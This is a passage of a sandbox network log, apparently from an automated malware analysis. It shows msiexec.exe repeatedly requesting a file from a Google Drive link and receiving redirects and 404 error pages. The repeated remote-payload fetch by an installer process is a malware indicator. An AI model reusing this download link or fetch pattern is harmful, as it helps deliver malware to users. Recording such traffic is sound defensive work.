                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:11 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 34 69 53 76 62 36 37 47 61 6b 72 5a 44 57 42 49 2d 5a 51 61 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="O4iSvb67GakrZDWBI-ZQaw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              18192.168.2.849727216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:12 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:12 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:12 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: script-src 'nonce-0kGUV4S16nOi9hCyD7xKrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              19192.168.2.849728172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:13 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:13 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgSd8evy-nKqm5OnXVOEwkl-h2Wog7HKKgXrnepq2Hektu7_Qe5nasDRrSlGLn1fH-2-
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:13 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-KL_ThV4n1YVTSP0R_vdcdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:13 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 48 4a 56 77 6b 65 5f 70 6f 31 77 5f 30 48 7a 62 6d 49 51 7a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BHJVwke_po1w_0HzbmIQzw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              20192.168.2.849729216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:14 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:14 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:14 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-tbyiSE0YIcfsR9rbmwXkUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              21192.168.2.849730172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:15 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:16 UTC1851INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFiumC4eIlwszR7WgQLFMAkwKL62kM_uJ1airFXq4UPHkwQtxywnj-Hm1dnggPgE5P0GUoYPIkhjZ_4
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:15 GMT
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: script-src 'nonce-HYysF1XtdZs9QqezX6LoXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:16 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 50 6c 7a 4b 73 4b 5a 51 67 69 4d 72 64 69 4e 71 4f 63 51 4f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sPlzKsKZQgiMrdiNqOcQOw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              22192.168.2.849731216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:16 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:17 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:17 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-y-bU6W2ukGrv4sEXzuw6lQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              23192.168.2.849732172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:18 UTC460OUTGET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Cache-Control: no-cache
                                                              Host: drive.usercontent.google.com
                                                              Connection: Keep-Alive
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:18 UTC1844INHTTP/1.1 404 Not Found
                                                              X-GUploader-UploadID: AFIdbgSpW8xOBkAT9QS_U2uFK7G2-VYKzvqNwhAZcILYHX2sLMQqgTchQtfFpiSW_7er8LZI
                                                              Content-Type: text/html; charset=utf-8
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:18 GMT
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-_1VUzfPAhMgPFEk-nWcpKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Content-Length: 1652
                                                              Server: UploadServer
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Content-Security-Policy: sandbox allow-scripts
                                                              Connection: close
                                                              2025-01-10 23:02:18 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 67 49 7a 53 44 78 6a 62 6d 77 5f 35 44 66 4f 59 55 51 61 4a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VgIzSDxjbmw_5DfOYUQaJA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              24192.168.2.849733216.58.206.464432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
                                                              2025-01-10 23:02:19 UTC418OUTGET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                              Host: drive.google.com
                                                              Cache-Control: no-cache
                                                              Cookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
                                                              2025-01-10 23:02:19 UTC1920INHTTP/1.1 303 See Other
                                                              Content-Type: application/binary
                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                              Pragma: no-cache
                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                              Date: Fri, 10 Jan 2025 23:02:19 GMT
                                                              Location: https://drive.usercontent.google.com/download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
                                                              Strict-Transport-Security: max-age=31536000
                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                              Cross-Origin-Opener-Policy: same-origin
                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                              Content-Security-Policy: script-src 'nonce-fImjNcpKB277T8onfsvITQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                              Server: ESF
                                                              Content-Length: 0
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              X-Content-Type-Options: nosniff
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              25192.168.2.849734172.217.16.1934432160C:\Windows\SysWOW64\msiexec.exe
                                                              TimestampBytes transferredDirectionData
